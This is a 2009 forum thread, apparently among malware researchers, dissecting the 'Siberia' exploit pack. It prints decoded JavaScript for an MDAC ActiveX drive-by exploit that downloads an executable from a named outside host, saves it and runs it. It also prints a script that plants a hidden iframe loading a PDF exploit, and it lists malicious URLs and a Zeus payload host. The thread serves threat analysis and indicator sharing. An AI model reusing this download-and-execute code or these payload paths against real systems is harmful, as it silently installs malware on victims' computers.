Author Topic: Siberia pack (Read 8919 times)

SysAdMini · December 20, 2009, 09:06:14 pm

Just discovered another exploit kit.

According to its control panel

www.useranalyticsreporting.net/ir/pack/stat.phpit's "Siberia pack"

I wouldn't label it "kit", because it contains only a single exploit for MDAC.

Obfuscated script starts here:

Code: [Select]

www.useranalyticsreporting.net/ir/pack/
This is the decoded script

Code: [Select]

                      url = 'http://www.useranalyticsreporting.net:80/ir/pack/exe.php?spl=MDAC';
                                            function mdac() {
					  url = '';
                      function CreateO(o,n){
                                var r=null;
                                try{r=o.CreateObject(n)}catch(e){}
                                if(!r){try{r=o.CreateObject(n,'')}catch(e){}}
                                if(!r){try{r=o.CreateObject(n,'','')}catch(e){}}
                                if(!r){try{r=o.GetObject('',n)}catch(e){}}
                                if(!r){try{r=o.GetObject(n,'')}catch(e){}}
                                if(!r){try{r=o.GetObject(n)}catch(e){}}
                                return(r);
                        }
                        function Go(a){
                                var eurl='http://www.useranalyticsreporting.net:80/ir/pack/exe.php?spl=MDAC';
                                var fname='hfdhfd.exe';
                                var fso=CreateO(a,'Scripting.FileSystemObject')
                                var sap=CreateO(a,'Shell.Application');
                                var x=CreateO(a,'ADODB.Stream');
                                var nl=null;
                                fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
                                x.Mode=3;
                                try{nl=CreateO(a,'Micr'+'osoft.XMLH'+'TTP');nl.open('GET',eurl,false);}
                                catch(e){try{nl=CreateO(a,'MSXML2.XMLHTTP');nl.open('GET',eurl,false);}
                                catch(e){try{nl=CreateO(a,'MSXML2.ServerXMLHTTP');nl.open('GET',eurl,false);}
                                catch(e){try{nl=new XMLHttpRequest();nl.open('GET',eurl,false);}
                                catch(e){return 0;}}}}
                                x.Type=1;
                                nl.send(null);
                                rb=nl.responseBody;
                                x.Open();
                                x.Write(rb);
                                x.SaveTofile(fname,2);
                                sap.ShellExecute(fname);
                                return 1;
                        }
                        function mdac() {
                                var i=0;
                                var target=new Array(
                                'BD96C556-65A3-11D0-983A-00C04FC29E36',
                                'BD96C556-65A3-11D0-983A-00C04FC29E30',
                                'AB9BCEDD-EC7E-47E1-9322-D4A210617116',
                                '0006F033-0000-0000-C000-000000000046',
                                '0006F03A-0000-0000-C000-000000000046',
                                '6e32070a-766d-4ee6-879c-dc1fa91d2fc3',
                                '6414512B-B978-451D-A0D8-FCFDF33E833C',
                                '7F5B7F63-F06F-4331-8A26-339E03C0AE3D',
                                '06723E09-F4C2-43c8-8358-09FCD1DB0766',
                                '639F725F-1B2D-4831-A9FD-874847682010',
                                'BA018599-1DB3-44f9-83B4-461454C84BF8',
                                'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19',
                                'E8CCCDDF-CA28-496b-B050-6C07C962476B',null);
                                while(target[i]){
                                        var a=null;
                                        a=document.createElement('object');
                                        a.setAttribute('classid','clsid:'+target[i]);
                                        if(a){try{var b=CreateO(a,'Shell.Application');if(b){Go(a);}}catch(e){}}
                                        i++;
                                }
                                return 0;
                        }
						function lala1() {
						return mdac();
						}
						function lala2() {
						return lala1();
						}
                        function lala3() {
						return lala2();
						}
						function lala4() {
						return lala3();
						}
						function lala5() {
						return lala4();
						}
						lala5();
					}
					mdac();

The payload isn't detected by any av product currently.
http://www.virustotal.com/analisis/1d25db57afd24594c98399e1bfc24da13fc88f2a4367f0609753ef8fb2e726d1-1261341921
http://www.threatexpert.com/report.aspx?md5=8e36fdfa3a6fdc319d2fa8a5948fc481

Garlando · December 20, 2009, 09:32:21 pm

contains pdf exploit too

SysAdMini · December 20, 2009, 09:36:49 pm

Quote from: Garlando on December 20, 2009, 09:32:21 pm

contains pdf exploit too

Yes, you are right. I missed the second part of the script.

Code: [Select]

function i7WVT41lG441T() {
		try {
			var fFSllQ4 = document.createElement("object");
			fFSllQ4.setAttribute("id","fFSllQ4");
			fFSllQ4.setAttribute("classid","clsid:CA8A9780-280D-11CF-A24D-444553540000");
			var yDViqkIoIr = fFSllQ4.GetVersions();
			yDViqkIoIr = yDViqkIoIr.split(",");
			yDViqkIoIr = yDViqkIoIr[4].split("=");
			yDViqkIoIr = yDViqkIoIr[1];
			eC5Y3hfycXHm2N = yDViqkIoIr.split(".");
			eC5Y3hfycXHm2N = eC5Y3hfycXHm2N[0];
			if ((eC5Y3hfycXHm2N <= 9) && (eC5Y3hfycXHm2N >= 6)) {
			document.write("<iframe width='10' height='10' frameborder='0' src='exp/pdf.php'></iframe>");
			}
		} catch(e) {}
	}
     i7WVT41lG441T();

SysAdMini · December 20, 2009, 10:43:33 pm

Malwareurl.com have also listed a Siberia pack today

Code: [Select]

traffic.banners.od.ua/p/
traffic.banners.od.ua/p/exp/pdf.php
traffic.banners.od.ua/p/exe.php?spl=PDF
traffic.banners.od.ua/p/stat.php

SysAdMini · December 22, 2009, 05:47:30 pm

Another one

Code: [Select]

traffic6.local-tc.com/us/control panel

Code: [Select]

traffic6.local-tc.com/us/stat.php
payload is a Zbot
http://www.virustotal.com/de/analisis/9cce5756e0956414144d6ca0079eca7f1e0281428bcf245598f1246edbc521f4-1261502233

Interesting fact :

related Zeus config file is hosted at priscillapresley.com
http://www.malwaredomainlist.com/mdl.php?search=priscillapresley.com

danielch1 · December 22, 2009, 05:53:46 pm

You can see the traffic from this url:

Code: [Select]

traffic6.local-tc.com/us/sell.php

SysAdMini · December 22, 2009, 05:58:41 pm

Quote from: danielch1 on December 22, 2009, 05:53:46 pm

You can see the traffic from this url:
Code: [Select]
traffic6.local-tc.com/us/sell.php

Nice one. Thanks.

SysAdMini · December 26, 2009, 12:28:05 pm

Siberia Exploit Pack. Another package of explois In-the-Wild
http://malwareint.blogspot.com/2009/12/siberia-exploit-pack-another-package-of.html

SysAdMini · May 28, 2010, 05:04:35 pm

Intelligence and operational level by Siberia Exploit Pack
http://malwareint.blogspot.com/2010/05/intelligence-and-operational-level-by.html

Author Topic: Siberia pack (Read 8919 times)

SysAdMini

Siberia pack

Garlando

Re: Siberia pack

SysAdMini

Re: Siberia pack

SysAdMini

Re: Siberia pack

SysAdMini

Re: Siberia pack

danielch1

Re: Siberia pack

SysAdMini

Re: Siberia pack

SysAdMini

Re: Siberia pack

SysAdMini

Re: Siberia pack